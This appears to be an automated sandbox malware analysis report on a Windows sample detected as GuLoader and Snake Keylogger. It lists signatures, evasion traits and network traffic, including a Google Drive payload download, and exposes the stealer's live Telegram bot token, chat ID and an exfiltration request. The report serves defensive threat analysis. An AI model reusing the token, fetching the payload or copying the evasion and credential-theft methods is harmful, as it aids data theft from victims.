Windows Analysis Report
JOSXXL1.exe

Overview

General Information

Sample name:	JOSXXL1.exe
Analysis ID:	1542950
MD5:	fb24966daab46af066a7b7c041236de9
SHA1:	391bb0f3da952bbbf14b61b7f6c01175344be882
SHA256:	8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
Tags:	exeuser-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: JOSXXL1.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D787A8 CryptUnprotectData,		4_2_39D787A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78EF1 CryptUnprotectData,		4_2_39D78EF1

Uses 32bit PE files

Source: JOSXXL1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2

Source: JOSXXL1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405974
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004064C6 FindFirstFileW,FindClose,	4_2_004064C6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F2C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F4AC
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015F45Dh	4_2_0015F52F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 0015FC19h	4_2_0015F961
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39692C19h	4_2_39692968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_39692DC8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969D7F9h	4_2_3969D550
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_3969310E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 396931E0h	4_2_39692DC2
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969DC51h	4_2_3969D9A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39690040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969FAB9h	4_2_3969F810
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969D3A1h	4_2_3969D0F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969CF49h	4_2_3969CCA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969F209h	4_2_3969EF60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39690D0Dh	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39691697h	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969EDB1h	4_2_3969EB08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969F661h	4_2_3969F3B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E501h	4_2_3969E258
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E0A9h	4_2_3969DE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3969E959h	4_2_3969E6B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D79280h	4_2_39D78FB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77EB5h	4_2_39D77B78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D762D9h	4_2_39D76030
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7ECA6h	4_2_39D7E9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75E81h	4_2_39D75BD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D718A1h	4_2_39D715F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7CCB6h	4_2_39D7C9E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7DA66h	4_2_39D7D798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75A29h	4_2_39D75780
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7FA56h	4_2_39D7F788
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72E59h	4_2_39D72BB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D71449h	4_2_39D711A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7BA76h	4_2_39D7B7A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7C826h	4_2_39D7C558
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72A01h	4_2_39D72758
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70FF1h	4_2_39D70D48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7E816h	4_2_39D7E548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7B5E6h	4_2_39D7B318
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D725A9h	4_2_39D72300
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7D5D6h	4_2_39D7D308
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D779C9h	4_2_39D77720
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D755D1h	4_2_39D75328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D75179h	4_2_39D74ED0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7C396h	4_2_39D7C0C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77571h	4_2_39D772C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70B99h	4_2_39D708F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7F5C6h	4_2_39D7F2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D70741h	4_2_39D70498
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then mov esp, ebp	4_2_39D7B081
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D76733h	4_2_39D76488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7E386h	4_2_39D7E0B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D72151h	4_2_39D71EA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D71CF9h	4_2_39D71A50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D702E9h	4_2_39D70040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D77119h	4_2_39D76E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D74D21h	4_2_39D74A78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7D146h	4_2_39D7CE78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D73709h	4_2_39D73460
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7F136h	4_2_39D7EE68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D76CC1h	4_2_39D76A18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D732B1h	4_2_39D73008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7BF06h	4_2_39D7BC38
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D748C9h	4_2_39D74620
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 39D7DEF6h	4_2_39D7DC28
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6970h	4_2_3A7C6678
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5986h	4_2_3A7C56B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C4746h	4_2_3A7C4478
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CD768h	4_2_3A7CD470
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CAC60h	4_2_3A7CA968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C0C2Eh	4_2_3A7C0960
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8158h	4_2_3A7C7E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3E26h	4_2_3A7C3B58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CEF50h	4_2_3A7CEC58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CC448h	4_2_3A7CC150
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5E16h	4_2_3A7C5B48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9940h	4_2_3A7C9648
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C030Eh	4_2_3A7C0040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6E38h	4_2_3A7C6B40
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3506h	4_2_3A7C3238
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CDC30h	4_2_3A7CD938
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CB128h	4_2_3A7CAE30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C54F6h	4_2_3A7C5228
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8620h	4_2_3A7C8328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CF418h	4_2_3A7CF120
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C2BE6h	4_2_3A7C2918
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CC910h	4_2_3A7CC618
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C19DEh	4_2_3A7C1710
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9E08h	4_2_3A7C9B10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C4BD7h	4_2_3A7C4908
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C7300h	4_2_3A7C7008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CE0F8h	4_2_3A7CDE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C22C6h	4_2_3A7C1FF8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CB5F0h	4_2_3A7CB2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C10BEh	4_2_3A7C0DF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8AE8h	4_2_3A7C87F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C42B6h	4_2_3A7C3FE8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CF8E0h	4_2_3A7CF5E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CCDD8h	4_2_3A7CCAE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6347h	4_2_3A7C5FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CA2D0h	4_2_3A7C9FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C079Eh	4_2_3A7C04D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C77C8h	4_2_3A7C74D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CE5C0h	4_2_3A7CE2C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CBAB8h	4_2_3A7CB7C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8FB0h	4_2_3A7C8CB8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CFDA8h	4_2_3A7CFAB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3076h	4_2_3A7C2DA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CD2A0h	4_2_3A7CCFA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C1E47h	4_2_3A7C1BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CA798h	4_2_3A7CA4A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5066h	4_2_3A7C4D98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C7C90h	4_2_3A7C7998
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CEA88h	4_2_3A7CE790
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C2756h	4_2_3A7C2488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CBF80h	4_2_3A7CBC88
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C154Eh	4_2_3A7C1280
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9478h	4_2_3A7C9180
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801FE8h	4_2_3A801CF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801190h	4_2_3A800E98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801B20h	4_2_3A801828
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800338h	4_2_3A800040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800CC8h	4_2_3A8009D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800801h	4_2_3A800508
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801658h	4_2_3A801360
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A843E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A843E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A840A03
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A840A10

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61886 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61919 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61908 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:61847 -> 142.250.185.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61922 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61902 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61933 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61945 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61913 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61976 -> 188.114.96.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
